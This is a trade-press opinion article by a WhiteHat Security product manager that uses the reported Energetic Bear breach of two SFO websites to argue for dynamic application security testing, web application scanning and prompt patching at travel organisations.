The average flight today is only transporting 10 passengers as airline volume has fallen 97 percent since a global emergency was declared in March. The Airlines for America trade group equates the current state of the industry “to a level not seen since 1954.”
But while airports continue to operate under thinning conditions, hackers persist. Just last month, Russian nation-state hackers Energetic Bear (DragonFly) were found responsible for a breach against SFO’s SFOConnect.com and SFOConstruction.com, compromising both websites and planting code that exploited an Internet Explorer bug to steal login credentials.
The report from ESET, the group that discovered the breach, mentioned that the intent of Energetic Bear was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix. By obtaining NTLM hashes, groups like Energetic Bear can then collect a user's Windows password, which, if they obtained credentials of an airport employee, could allow the group to exploit them and move into back-end corporate databases.
This incident is a harsh reminder that, though airports may be slower in the face of a global pandemic, organizations are never out of danger from a data breach of personal information. In fact, it’s likely that hackers are aware of heightened vulnerabilities within organizations, prompting cybercriminals to work faster than ever.
Which makes now the time to zero in on website and application security to make sure no assets go unprotected in these trying times. Businesses can minimize this risk and prevent it from happening to them by taking a few things into consideration.
Discover the Significance of DAST
First, IT and OPs must make security testing part of the entire lifecycle of an application. This can take shape in something like dynamic application security testing (DAST), which is a security checking process that uses penetration tests on applications while they run. DAST begins once applications have gone into production or entered runtime, following earlier lifecycle stages. These runtime tests are important in catching cyberattacks and threats that may only be obvious once an application has gone live. DAST would continually scan websites like SFOConnect.com and SFOConstruction.com as they evolved, even after execution. This technique allows for automatic detection and assessment of anomalous behavior and code alternations. Once a vulnerability is discovered, automated alerts can be prioritized.
The more applications that are used to optimize a site, the more potential vulnerabilities to cyberattack. Integrating security testing through an entire lifecycle is vital for web application security program effectiveness since some errors and vulnerabilities only appear once production has started.
Deploy Web Application Scanners
Web application scanning — also referred to as web application vulnerability scanning or web application security scanning — is a foundational part of DevSecOps and is often considered a key part of DAST.
The automated security tool crawls a website or application for malware, vulnerabilities and logical flaws. After analyzing all the discoverable web pages and files, it constructs a software structure of the entire website. Web application scanners then use black box tests, which don’t require access to source code, to perform simulated attacks against an application and then analyze the results.
It tests the application later in the development lifecycle and after release, in runtime. There are multiple commercial and open-source scanners available in the marketplace today. Each is designed to automate security tasks, lower the cost of security and increase security coverage.
Apply Patches to Applications Immediately
For many organizations, especially large organizations like SFO that run many systems and software simultaneously, staying up to date on the latest security patches has to be a priority. But, too often it isn’t considered urgent or even necessary. Businesses can often associate patching cycles with downtime and putting a hold on business and productivity. Granted, testing an application itself can be incredibly time-consuming, coupled with the need to schedule some downtime, and there’s a process that can take a significant amount of time.
This again opens an organization up to an attack like Energetic Bear’s. Because of this tedious and sometimes risky patching cycle, IT and Ops organizations are often left contemplating stability vs. security for their customers. But, when a security patch comes out, it means there’s a known flaw in a system that can be exploited at any minute. It’s the warning flare to take action ASAP, not months down the road. Internal IT and Ops teams need to make sure the right resources are in place and programs are in effect to prioritize the security of their organization and take the necessary steps to secure important assets.
Modern travel and transportation organizations are not only operating in a generally competitive market, but they’re also managing an enormous amount of web applications today, along with balancing several external demands from regulators, investors and even public health officials. Breaches like these at SFO are inevitable, yes, but the impact can only be mitigated quickly if these organizations employ good application security and testing practices. Even through the period of downturn within the travel economy, it’s imperative for infosec teams to embrace DevSecOps and better collaborate on application security throughout all areas of operation.
Bryan Becker is a product manager and researcher at WhiteHat Security. Bryan has been working in application development and security since the startup scene in 2003. Before working at WhiteHat Security, he worked as a contractor in the startup hub of Asia, Shenzhen, China. There, he helped multiple startups develop internal and external facing applications, as well as developed strong security policies that are realistically achievable with strapped resources. He has also been heavily involved in the blockchain startup industry in Hong Kong, where he helped small teams get proof-of-concept blockchain apps up and running to present to venture capitalists.
